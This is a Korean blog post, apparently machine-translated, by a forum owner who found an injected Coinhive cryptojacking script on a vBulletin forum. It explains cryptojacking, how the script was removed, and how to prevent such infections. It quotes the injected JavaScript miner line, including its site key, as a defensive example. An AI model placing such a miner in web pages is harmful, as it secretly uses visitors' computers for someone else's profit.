웹 사이트에서 Coinhive 암호화 마이닝 스크립트를 제거하는 방법

저는 보통 포럼을 매일 방문하며 전날 그것을 보지 못했습니다. 그래서 나는 잠자고있는 밤 시간대에 이런 일이 일어났다 고 생각합니다.

포럼에 vBulletin 소프트웨어를 사용하고 최신 버전으로 업데이트되었습니다. 또한 TheWindowsClub.com 도메인이 온라인 웹 위협 및 공격으로부터 자신을 보호하기 위해 Sucuri Web Antivirus & Firewall 를 사용함에 따라 이것은 매우 놀랍습니다.

내 PC 보안 소프트웨어가 악성 스크립트가 성공적으로 실행되는 것을 중지했습니다. 내 Windows 10 컴퓨터에서. Chrome & Edge와 같은 다른 브라우저에서 확인한 결과는 동일합니다.

포럼 웹 페이지를 마우스 오른쪽 버튼으로 클릭하고 소스 코드를 확인한 후 CoinHive의 CryptoMiner 악성 스크립트임을 확인했습니다.

이것은 내 포럼 코드에 들어있는 악의적 인 Coinhive Javascript입니다.

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

어쨌든, 내가 한 첫 번째 작업은 포럼에 참여하고 Sucuri에게 알리십시오.

Sucuri 사람들은 몇 시간 만에 포럼에 참여한 Coinhive 스크립트의 포럼을 정리하고 괜찮 았습니다.

CoinHive 란 무엇입니까?

Coinhive 쿠폰 귀하의 웹 사이트에 삽입 할 수있는 Monero 암호 해독을위한 JavaScript 광부이며 귀하를 위해 동전을 채취하기 위해 웹 사이트 방문자 컴퓨터의 CPU를 사용합니다.

이것은 Cryptojacking 라고합니다. cryptocurrency 마이닝을 위해 사용자의 브라우저를 납치하는 작업이 포함됩니다. 일부 웹 사이트 소유자는 돈을 벌기 위해 자신을 사용할 수 있지만, 우리의 경우에는 주사를 맞았습니다.

사용자가 감염된 사이트에 액세스하면 Coinhive JavaScript가 실행되어 사용자의 CPU 리소스를 사용하여 Monero를 실행합니다. 이로 인해 CPU가 스로틀 링되고 예상치 못한 시스템의 시스템 충돌이 발생할 수 있습니다.

이제 브라우저가 감염되면 리소스 사용률이 올라갑니다. 브라우저를 닫으면 브라우저가 종료됩니다.

Mac 을 사용하여 내 동료 인 Saurabh Mukhekar에게 내 포럼을 방문하고 무슨 일이 일어 났는지 물어 보았습니다. 그가 사파리로 포럼을 열었을 때 그의 맥 컴퓨터도 영향을 받았다. 그는 Mac 용 바이러스 백신 소프트웨어를 사용하는 스마트 맥 OSX 사용자 중 한 명입니다. 맥용 애버 스트 바이러스 백신은 악성 스크립트 실행을 성공적으로 막았습니다. Saurabh,

CoinHive 멀웨어는 브라우저 기반 자바 스크립트 감염과 마찬가지로 Windows PC뿐만 아니라 Mac도 침입합니다. Mac이 바이러스 백신 소프트웨어를 필요로하지 않는다는 사실을 믿지 않는다면, 내 컴퓨터가 감염되어 Mac이 계속 다른 사람의 동전을 털어 놓았을 것입니다.

CoinHive가 귀하의 웹 사이트를 감염시키지 못하게합니다

웹 사이트 / 포럼에 NULL 템플릿이나 플러그인을 사용하지 마십시오.

1. CMS를 최신 버전으로 유지하십시오.
2. 호스팅 소프트웨어를 정기적으로 업데이트하십시오 (PHP, 데이터베이스 등).
3. Sucuri, Cloudflare, Wordfence 등의 웹 보안 제공 업체로 웹 사이트 보안을 설정하십시오.
4. 블로그 보안을위한 기본 예방 조치를 취하십시오.
5. 웹 사이트에서 CoinHive 광부 제거

우선 웹 사이트의 웹 마스터가되어야합니다. 감염된 웹 사이트 또는 모든 웹 사이트 파일에 액세스 할 수있는 관리 자격 증명이 있어야합니다.

이제 바이러스 백신이 CoinHive 감염을 감지하면 웹 페이지를 마우스 오른쪽 단추로 클릭하고

소스 코드보기 를 선택하십시오. 다음으로 Ctrl + F 를 누르고 "CoinHive"를 검색하십시오. 악성 코드의 위치를 ​​확인한 후에 위치를 확인해야합니다. 이제 수동으로 제거해야합니다. 이렇게하려면 플랫폼에 대한 코딩 지식이 필요합니다. 감염된 파일을 찾아 수동으로 제거해야합니다. 확실하지 않으면 전문가에게 물어보십시오. Sucuri를 사용하기 때문에 우리는 그것을하도록합니다.

서버와 브라우저 캐시를 지우십시오. 캐시 플러그인을 사용하거나 MaxCDN이라고 말하면 캐시도 지우십시오.

암호화 마이닝 스크립트로부터 자신을 보호하십시오.

Cryptocurrencies & Blockchain 기술이 세계를 대신합니다. 세계 경제에 영향을 미치고 기술 혼란을 야기하고 있습니다. 모두는 그런 유리한 시장에 집중하기 시작했습니다. 여기에는 웹 사이트 해커도 포함됩니다. 수익이 증가함에 따라 이러한 기술이 오용 될 것으로 예상됩니다. 그것은 신흥 기술의 어두운면입니다.

우리가 할 수있는 일은 가능한 한 최상의 예방 조치를 취하는 것입니다. 훌륭한 보안 소프트웨어를 사용하는 것 외에도 웹 사이트가 CPU를 사용하여 Cryptocurrency를 차단하지 못하게하는 Chrome 또는 Firefox 확장 기능을 사용하십시오. 더 나은 점은 Hosts 파일을 수정하여 Cryptojacking Mining Script 공격을 중지하는 Anti-WebMiner를 사용하는 것입니다. 모든 브라우저에서 작동합니다. Mac 사용자 인 경우 컴퓨터 용 바이러스 백신 소프트웨어도 함께 제공하십시오.

예방 조치의 중요성에 따라 감염된 사이트를 방문한 적이 있다고 생각되는 경우 브라우저를 지우는 것이 좋습니다 AdwCleaner뿐 아니라 바이러스 백신 소프트웨어로 컴퓨터를 캐시하고 검사하십시오.

안전하게 지켜주세요!